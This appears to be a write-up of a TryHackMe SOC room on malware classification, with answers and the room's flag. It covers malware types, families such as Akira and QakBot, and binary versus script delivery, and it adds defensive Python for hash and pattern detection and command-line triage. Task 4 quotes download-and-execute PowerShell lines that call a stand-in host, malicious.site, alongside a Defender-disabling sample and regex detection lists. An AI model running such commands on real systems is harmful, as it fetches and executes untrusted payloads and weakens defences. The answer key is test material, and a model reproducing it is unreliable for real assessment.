Task 1 — Introduction Summary
Malware is software designed to damage systems, steal data, or provide unauthorized access. It comes in various forms, each with distinct tactics and objectives, impacting businesses through financial loss, data breaches, service disruption, and reputational damage.
In a Security Operations Center (SOC), analysts monitor security alerts and determine appropriate actions based on malware classification. Correctly identifying malware helps in decisions like isolating infected systems or investigating data exfiltration.
This task covers key malware categories, real-world examples, and the differences between binary (executable) and script-based threats.
Learning objectives include:
- Classifying malware based on behavior and purpose.
- Understanding real-world malware operations.
- Distinguishing between executable and script-based malware.
- Practicing malware classification.
Question Answers
- No answer needed for this task.
Task 2 — Malware Types Summary
Understanding the main categories of malware and their behavior helps security analysts quickly identify threats and respond effectively. Malware can be classified into different types, each designed with a specific purpose and attack method.
Common Malware Categories
[Image in the original: a table of the common categories covered in this task, Adware, Spyware, Ransomware, Wiper, C2 Malware, Data Stealer, Keylogger and Cryptominer, with a one-line description of each. The scenarios below illustrate them.]
Scenario-Based Examples
- Adware: Pop-up ads appear even when no site is open; suspicious background program identified.
- Spyware: Personal emails accessed without consent; spyware recording keystrokes detected.
- Ransomware: Files encrypted, ransom note displayed; triggered by malicious email.
- Wiper: Servers crash, files overwritten randomly; no ransom demand.
- C2 Malware: Endpoint communicating with strange domains; allows remote attacker control.
- Data Stealer: Sensitive documents posted online; data exfiltrated by malware.
- Keylogger: Unauthorized bank transfers traced to a keylogger recording keystrokes.
- Cryptominer: System slowdown with constant high CPU and fan usage due to mining activity.
Question Answers
- Cryptominer — Constant high CPU usage causing system slowdown.
- Ransomware — Files encrypted and ransom demanded for unlocking.
- Adware — Browser shows pop-ups with no data theft or encryption.
- Data Stealer — Internal documents leaked online from malicious program.
Task 3 — Real-World Malware Examples Summary
Malware seen in the wild reflects real-world threats SOC analysts face regularly. Grouping malware into families — based on shared code or behavior — helps defenders apply effective detection and mitigation strategies.
Case Studies of Malware Families
- Spyware — Pegasus
Targets mobile phones silently, delivered through crafted messages that exploit vulnerabilities in the device, often with no user interaction (zero-click). Collects texts, location, emails, calls, and recordings.
MITRE ATT&CK: TA0009 (Collection), TA0010 (Exfiltration)
- Ransomware — Akira
Targets businesses, schools, and public services, gaining entry via phishing or exposed remote-access services. Encrypts files and demands a cryptocurrency ransom, often also threatening to leak stolen data if it is not paid.
MITRE ATT&CK: TA0040 (Impact), TA0011 (Command and Control)
- Wiper — Shamoon
Overwrites files with junk data to take whole networks of machines out of service. There is no ransom and no recovery path on offer, which is what separates a wiper from ransomware. Best known for the attack on Saudi Aramco.
MITRE ATT&CK: TA0040 (Impact)
- Data Stealer — Agent Tesla
Delivered via phishing attachments. Captures keystrokes, screenshots, and saved credentials, and sends them to its C2 servers.
MITRE ATT&CK: TA0010 (Exfiltration)
- Keylogger — RedLine Stealer
Acts as both data stealer and keylogger. Collects keystrokes, browser cookies, and cryptocurrency wallet data, then sends them to the attacker.
MITRE ATT&CK: TA0006 (Credential Access), TA0010 (Exfiltration)
- C2 RAT — QakBot (QBot)
Started as a banking trojan; now a modular remote access trojan used for credential theft, lateral movement, and loading follow-on ransomware (e.g., Black Basta). Delivered via phishing.
MITRE ATT&CK: TA0011 (Command and Control), TA0002 (Execution), TA0006 (Credential Access)
Question Answers
- Agent Tesla — Logs keystrokes, screenshots, and exfiltrates browser credentials.
- Pegasus — Zero-click exploit installs spyware to monitor calls, messages, and location.
- Akira — Ransomware family that threatens data leaks if ransom is not paid.
- Shamoon — Wiper malware that overwrites files with junk data, targeting energy companies.
Task 4 — Binary vs Script Malware Summary
Malware typically arrives in two main forms: binary (compiled executables) and script-based. Understanding their differences helps SOC analysts better identify and respond to threats.
Binary Malware
- Delivered as compiled files such as .exe (executables) or .dll (dynamic link libraries).
- Arrives via email attachments, malicious downloads, removable media, or is dropped by malware already on the host.
- Often disguised with a misleading icon or a double extension (e.g., invoice.pdf.exe), which Windows Explorer shows as invoice.pdf because known extensions are hidden by default.
- Identifiable by static checksums (MD5, SHA-1 or SHA-256 hashes) or by hardcoded strings and byte patterns. Caveat: a hash only matches that exact file, so a single changed byte (a recompile or repack) defeats it; string and byte-pattern signatures survive such small changes, though packing or obfuscation can break them too.
- Generally more stable than scripts and better suited to complex payloads.
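To make the hash-versus-pattern point concrete, here is an added Python example; it is not code from the room or from TryHackMe. It builds a small constructed byte blob standing in for a compiled payload (not real malware), hashes it, pulls out printable strings the way the Unix strings tool does, and checks a YARA-style rule that combines a hardcoded URL with a short opcode sequence. A one-byte "rebuild" of the blob shows why a hash blocklist misses the variant while the pattern rule still fires. The blob, the rule and the blocklist are all illustrative assumptions.

```python
import hashlib
import re

# Constructed stand-in for a compiled payload (not real malware): a fake "MZ"
# header, padding, a hardcoded C2 URL and a short x86-64 opcode run.
ORIGINAL = (b"MZ\x90\x00" + b"\x00" * 12
            + b"http://malicious.site/payload" + b"\x00" * 8
            + b"\x48\x83\xec\x28")          # sub rsp, 0x28

# The same payload after a trivial rebuild: exactly one padding byte differs.
_v = bytearray(ORIGINAL)
_v[5] = 0x01
VARIANT = bytes(_v)


def hashes(blob: bytes) -> dict:
    """Static checksums of the whole file: any changed byte changes every value."""
    return {name: hashlib.new(name, blob).hexdigest()
            for name in ("md5", "sha1", "sha256")}


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs, like the `strings` tool: where hardcoded URLs,
    paths and mutex names in a binary tend to show up."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)


# An illustrative byte-pattern rule in the spirit of YARA (not a published
# signature): a hardcoded string plus an opcode sequence whose immediate
# byte is wildcarded, so small rebuilds still match.
RULE = {
    "name": "demo_payload_pattern",
    "patterns": [
        re.compile(rb"http://malicious\.site/payload"),
        re.compile(rb"\x48\x83\xec.", re.DOTALL),   # sub rsp, imm8 (imm8 wildcarded)
    ],
}


def matches_rule(blob: bytes, rule: dict) -> bool:
    """Every pattern in the rule must appear somewhere in the blob."""
    return all(p.search(blob) for p in rule["patterns"])


def classify(blob: bytes, known_bad_sha256: set, rule: dict) -> str:
    """Exact hash lookup first, then the change-tolerant pattern rule."""
    if hashes(blob)["sha256"] in known_bad_sha256:
        return "known-bad (hash match)"
    if matches_rule(blob, rule):
        return "suspicious (pattern match, hash unknown)"
    return "no match"


if __name__ == "__main__":
    blocklist = {hashes(ORIGINAL)["sha256"]}
    for label, blob in (("original", ORIGINAL), ("variant", VARIANT)):
        print(label, hashes(blob)["md5"], extract_strings(blob),
              classify(blob, blocklist, RULE))
```

Running it shows the original hitting the blocklist, the one-byte variant with a completely different MD5/SHA-256 yet still caught by the string-plus-opcode rule, and the same hardcoded URL recovered from both by the strings pass. In practice hash lists are cheap and exact, pattern rules are what carry detection across rebuilds, and both are defeated by packing, which is why dynamic analysis still matters.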
Script-Based Malware
- Written in scripting languages such as JavaScript (.js), PowerShell (.ps1), Visual Basic Script (.vbs), or batch files (.bat).
- Commonly delivered as email attachments (typically Office documents carrying macros), through malicious websites, or embedded inside other documents.
- Can be run by the system's built-in interpreter straight from memory, for example a script downloaded and handed to Invoke-Expression, so the payload never has to be written to disk.
- Warning signs of malicious scripts:
- Downloads or executes other files.
- Modifies system settings or disables security tools.
- Executes encoded or obfuscated commands.
- Spawns cmd.exe or PowerShell from an unexpected parent, such as an Office application.
Example Commands
- Batch script (two commands: the first uses PowerShell to download the payload, the second runs it):
powershell -Command "Invoke-WebRequest http://malicious.site/payload.exe -OutFile C:\Users\Public\payload.exe"
start C:\Users\Public\payload.exe
- PowerShell one-liner (-nop skips the user profile, -w hidden hides the console window, -c passes the command; IEX runs the downloaded text without saving it to disk):
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"
Obfuscation Example
- LummaStealer keeps its obfuscated payload in a single large variable; at runtime the data is base64-decoded, loaded as a .NET assembly and executed in memory, so the decoded code never lands on disk where file-based scanning would see it.
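As an added example (not code from the room), the following Python applies the warning signs listed above to command lines like the two shown, and handles the base64 style of the obfuscation example: PowerShell's -EncodedCommand argument is base64 over UTF-16LE text, so the triage decodes it and scans the plaintext with the same rules. The sample command lines are constructed (the Defender-disabling cmdlet is real, but it is used here only as sample input); the regexes and the two-signal threshold are illustrative, not a production detection.

```python
import base64
import re

# Constructed command lines modelled on the examples above (not real telemetry).
# The third wraps a Defender-disabling command in -EncodedCommand the way
# PowerShell expects it: base64 over UTF-16LE.
_HIDDEN = "Set-MpPreference -DisableRealtimeMonitoring $true"
SAMPLES = [
    'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')"',
    r'powershell -Command "Invoke-WebRequest http://malicious.site/payload.exe -OutFile C:\Users\Public\payload.exe"',
    "powershell -EncodedCommand " + base64.b64encode(_HIDDEN.encode("utf-16-le")).decode("ascii"),
    r'powershell -Command "Get-ChildItem C:\Users\Public"',
]

# One illustrative regex per warning sign from the text (not exhaustive).
SIGNALS = {
    "downloads or executes other files": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|"
        r"Invoke-Expression|\bIEX\b|Start-Process|\bstart\s+\S+\.exe", re.I),
    "modifies settings or disables security tools": re.compile(
        r"Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring|"
        r"netsh\s+advfirewall|\breg(?:\.exe)?\s+add\b|vssadmin|bcdedit", re.I),
    "encoded or obfuscated command": re.compile(
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String|\[char\]\d+|`[a-z]", re.I),
    "hidden window or profile bypass": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", re.I),
}
ENC_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not valid base64 / not UTF-16 text
        return None


def triage(cmdline: str) -> dict:
    """Score one command line against the warning signs; a decoded payload is scanned too."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    signals = [name for name, rx in SIGNALS.items() if rx.search(haystack)]
    if len(signals) >= 2:
        verdict = "likely malicious"        # illustrative threshold, not a tuned rule
    elif signals:
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"decoded": decoded, "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    for s in SAMPLES:
        r = triage(s)
        print(r["verdict"], "|", ", ".join(r["signals"]) or "-", "|", s[:60])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The encoded sample is the instructive one: on the raw command line nothing but the long base64 token looks wrong, and only after decoding does the Defender-disabling cmdlet appear. Without the decode step the triage would rate it "suspicious" on obfuscation alone; with it, the line earns two signals. The same idea scales to a real SOC workflow, where the decoded text is what gets attached to the alert.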
Question Answers
- PowerShell — Frequently used by script-based malware to download payloads.
- .bat — Another file extension commonly associated with script-based malware (batch scripts).
- Binary Malware — More likely to leave identifiable byte patterns used by antivirus software.
Task 5 — Practical
What is the flag?
THM{Malwar3_cl4ss1fication_p4ss3d}
Task 6 — Conclusion Summary
Malware remains one of the most common and dangerous threats that security defenders face. Proper classification of malware improves detection, investigation, and incident response capabilities. In this room, learners explored:
- The key malware types and their behaviors in real-world scenarios, such as Spyware, Ransomware, Wipers, Keyloggers, Data Stealers, Cryptominers, and Command and Control (C2) Malware.
- The concept of malware families, helping to apply known defenses based on shared origins or behaviors.
- The differences between binary (compiled executables) and script-based malware, along with their delivery methods (e.g., email attachments, malicious websites).
- Practical skills in identifying indicators of compromise (IoCs) like abnormal processes, network connections, high CPU usage, and suspicious file modifications.
Key Takeaways
- How to effectively identify and classify common malware types.
- How malware behaves and spreads during real-world attacks.
- How to distinguish between binaries and scripts in malware analysis.
- Practical application of classification skills in a simulated SOC environment using alert analysis.
The completion of this lab demonstrates an improved ability to classify and respond to malware incidents accurately.